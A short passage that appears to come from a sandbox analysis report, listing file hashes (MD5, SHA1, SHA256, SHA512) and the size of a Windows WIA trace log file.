SHA2565b0c3818de4ace2dd0d4f108314b847195ca81b2fbc01b4a26fcf7921231bc3b
SHA5124af2f7f10cc6b189d5e438990db020f8c6d526941cff2d098a67588b4d3451806b3bbd649eb2c1222464381e788518e542c5997d0a211c647ff4207709e8aef3
-
C:\Windows\Debug\WIA\wiatrace.logFilesize
1KB
MD5aee79d3bdd656246c07828a955a3eaf9
SHA126d5edc66ea9b7d04a8082e3085f29b73cc253d3
SHA2564b50028dedf3d6e0581b435ae9f1e37d25aa603b1b7e49bedaaa3823b53548c3
SHA51271cdaa1718cd250f6e2381b67a560b316278d34b72a85008f86818bcae157a6f8412ac35a088e8bccbe013e15accaa69e83e06094b618b6c0fdeed4b13117324